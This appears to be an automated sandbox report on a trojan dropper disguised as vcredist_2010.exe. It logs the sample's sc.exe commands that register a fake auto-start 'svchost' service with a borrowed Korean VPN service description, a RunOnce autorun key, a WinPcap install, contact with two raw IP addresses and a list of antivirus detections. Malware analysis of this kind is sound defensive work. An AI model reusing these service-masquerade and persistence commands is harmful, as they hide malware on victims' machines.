cmdline	C:\Windows\System32\sc.exe create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
cmdline	C:\Windows\System32\sc.exe start svchost
cmdline	net start npf
cmdline	"C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
cmdline	"C:\Windows\system32\sc.exe" description svchost "이 컴퓨터와 인터넷 또는 원격 네트워크 간의 전화 접속 연결과 가상 사설망(VPN) 연결을 관리합니다. 이 서비스를 사용하지 않으면 이 서비스에 명시적으로 종속된 모든 서비스가 시작되지 않습니다."
cmdline	C:\Windows\System32\sc.exe description svchost "이 컴퓨터와 인터넷 또는 원격 네트워크 간의 전화 접속 연결과 가상 사설망(VPN) 연결을 관리합니다. 이 서비스를 사용하지 않으면 이 서비스에 명시적으로 종속된 모든 서비스가 시작되지 않습니다."

One or more of the buffers contains an embedded PE file (3 events)

buffer	Buffer with sha1: d345c44f02b1db02c806e700d025f2b3c3ab36cd
buffer	Buffer with sha1: cb9e3c0b48f5022594ee5da930a34317498e25ba
buffer	Buffer with sha1: a1ff8249425c05fae534aa6a2ea989c40e3c52fa

Communicates with host for which no DNS query was performed (2 events)

host	113.212.88.60
host	121.254.136.19

Attempts to stop active services (1 event)

Time & API	Arguments	Status	Return	Repeated
ControlService Nov. 2, 2021, 11:01 a.m.	service_handle: 0x00559aa8 service_name: MSIServer control_code: 1	1	1	0

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{ea14036a-96ff-4c95-a988-78d36f0ccffa}				reg_value	"C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\vcredist_x64.exe" /burn.runonce
service_name	svchost				service_path	C:\Windows\SysWOW64\RuntimeBroker.exe

Created a service where a service was also not started (3 events)

Time & API	Arguments	Status	Return
CreateServiceA Nov. 2, 2021, 11:01 a.m.	service_start_name: start_type: 3 password: display_name: NetGroup Packet Filter Driver filepath: C:\Windows\System32\system32\drivers\npf.sys service_name: NPF filepath_r: system32\drivers\npf.sys desired_access: 983551 service_handle: 0x008a7d88 error_control: 1 service_type: 1 service_manager_handle: 0x008a7d38	1	9076104
CreateServiceA Nov. 2, 2021, 11:01 a.m.	service_start_name: start_type: 3 password: display_name: Remote Packet Capture Protocol v.0 (experimental) filepath: C:\Windows\System32\"%ProgramFiles(x86)%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles(x86)%\WinPcap\rpcapd.ini" service_name: rpcapd filepath_r: "%ProgramFiles(x86)%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles(x86)%\WinPcap\rpcapd.ini" desired_access: 983551 service_handle: 0x008a7d38 error_control: 1 service_type: 16 service_manager_handle: 0x008a7b08	1	9076024
CreateServiceW Nov. 2, 2021, 10:54 a.m.	service_start_name: start_type: 2 password: display_name: svchost filepath: C:\Windows\SysWOW64\RuntimeBroker.exe service_name: svchost filepath_r: C:\Windows\SysWOW64\RuntimeBroker.exe desired_access: 983551 service_handle: 0x00000000001466b0 error_control: 1 service_type: 16 service_manager_handle: 0x0000000000146680	1	1337008

Installs WinPCAP (3 events)

file	C:\Windows\System32\Packet.dll
file	C:\Windows\System32\drivers\npf.sys
file	C:\Windows\System32\wpcap.dll

Stops Windows services (1 event)

service

NPF (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NPF\Start)

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Lionic	Trojan.MSIL.Agent.b!c
MicroWorld-eScan	Gen:Variant.MSILHeracles.25837
FireEye	Generic.mg.b118cd4261d84677
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
ALYac	Gen:Variant.MSILHeracles.25837
Cylance	Unsafe
Sangfor	Trojan.MSIL.Agent.gen
CrowdStrike	win/malicious_confidence_60% (W)
Arcabit	Trojan.MSILHeracles.D64ED
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Dropper.MSIL.Agent.gen
BitDefender	Gen:Variant.MSILHeracles.25837
Avast	Win32:MalwareX-gen [Trj]
Tencent	Msil.Trojan-dropper.Agent.Pbeu
Ad-Aware	Gen:Variant.MSILHeracles.25837
Emsisoft	Gen:Variant.MSILHeracles.25837 (B)
TrendMicro	TROJ_GEN.R002C0PK121
McAfee-GW-Edition	GenericRXIT-RW!B118CD4261D8
Sophos	Mal/Generic-S
Ikarus	Trojan.Agent
Avira	TR/ATRAPS.Gen
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	Gen:Variant.MSILHeracles.25837
Cynet	Malicious (score: 99)
McAfee	GenericRXIT-RW!B118CD4261D8
MAX	malware (ai score=89)
Malwarebytes	Trojan.Dropper.SVC
SentinelOne	Static AI - Malicious PE
Fortinet	PossibleThreat
BitDefenderTheta	Gen:NN.ZemsilF.34236.bm0@aiXtFwp
AVG	Win32:MalwareX-gen [Trj]
Cybereason	malicious.a9868a
Panda	Trj/GdSda.A
MaxSecure	Trojan.Malware.300983.susgen

vcredist_2010.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All